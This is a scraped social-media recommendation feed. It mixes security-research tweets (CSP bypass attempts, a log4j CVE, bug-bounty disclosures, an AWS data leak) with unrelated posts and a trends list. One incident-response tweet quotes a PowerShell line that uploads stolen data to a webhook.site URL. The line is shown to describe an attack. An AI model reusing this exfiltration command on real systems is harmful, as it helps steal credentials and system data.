You might like
We (@akamai_research) often see these CSP bypass attempts. Example for googleapis.com w/OOB beaconing/blind XSS References: cspbypass.com github.com/renniepak/CSPB…
1/ Using webhooks to dump stolen credentials or information about a compromised system is not new. [1] In an incident a few weeks ago, we also saw a PSH script that used this mechanism: New-Object System.Net.WebClient).UploadString("webhook.site/f9f270f7-f..") 🧵
![malmoeb's tweet image. 1/ Using webhooks to dump stolen credentials or information about a compromised system is not new. [1]
In an incident a few weeks ago, we also saw a PSH script that used this mechanism:
New-Object System.Net.WebClient).UploadString("webhook.site/f9f270f7-f..")
🧵](https://pbs.twimg.com/media/Fd45SlOXkAI7TH4.jpg)
"How AWS Misconception Resulted in Detection of 5 Million Personal Records" by @CheckPointSW hackernoon.com/how-aws-miscon… #checkpoint #cybersecurity
hackernoon.com
How AWS Misconception Resulted in Detection of 5 Million Personal Records | HackerNoon
A misconception of users had led to over five million records containing personal identifying information to be left on an AWS service, a serious leak.
Reported 2 critical bugs to @InterlayHQ through @immunefi All issue fixed, no funds lost🥳 The #Bitcoin bridge of @harmonyprotocol shares the design, are they #SAFU? 🤡pwning.mirror.xyz/jlT8OgtwN3mQf3…
You can read @PwningEth's blogpost of the responsible disclosure here: pwning.mirror.xyz/okyEG4lahAuR81…
What happened is scientists discovered chlorofluorocarbons were bad for the ozone, countries believed them, the Montreal Protocol was signed, and CFC use fell by 99.7%, leading to the stabilization of the ozone layer, perhaps the greatest example of global cooperation in history.
Remember when they spent years telling us to panic over the hole in the ozone layer and then suddenly just stopped talking about it and nobody ever mentioned the ozone layer again?
Look at yourself, examine what needs to grow, but make sure the inner work doesn’t become another way to beat yourself up.
What's up ? Researchers , Any one out there for #android #bug collaboration #bugbounty
🥵Busy week at @Hacker0x01 helping customers eliminate exposure to #log4j vuln: - 1000+ vulnerability reports submitted 🗒️ - 400+ hackers submitted 🕵️♀️ - 75 confirmed and awarded (more pending) - $142,250 paid out 💰
CVE-2021-45046 is vulnerable when attackers can control **non-message** parts of the pattern layout. Here are some examples 🧵
Black Friday warmup🔥 Get a chance to win a SecurityTrails swag pack: Comfy t-shirt ✔️ Classic (and a favorite) hacker hoodie ✔️ Stickers ✔️ Just RT this tweet and make sure to follow @securitytrails - one winner will be chosen randomly on November 26th 2021 at 00:00 EST.
United States Trends
- 1. Steelers 52.9K posts
- 2. Rodgers 21.3K posts
- 3. Chargers 38.1K posts
- 4. Tomlin 8,383 posts
- 5. Resign 110K posts
- 6. Schumer 229K posts
- 7. Mr. 4 4,861 posts
- 8. Tim Kaine 20.9K posts
- 9. Sonix 1,212 posts
- 10. #BoltUp 3,072 posts
- 11. Dick Durbin 13.6K posts
- 12. Rudy Giuliani 10.6K posts
- 13. 8 Democrats 9,743 posts
- 14. Angus King 17.5K posts
- 15. Keenan Allen 5,074 posts
- 16. #ITWelcomeToDerry 4,891 posts
- 17. 8 Dems 7,580 posts
- 18. #RHOP 7,089 posts
- 19. #HereWeGo 5,744 posts
- 20. Maggie Hassan 17.8K posts
Something went wrong.
Something went wrong.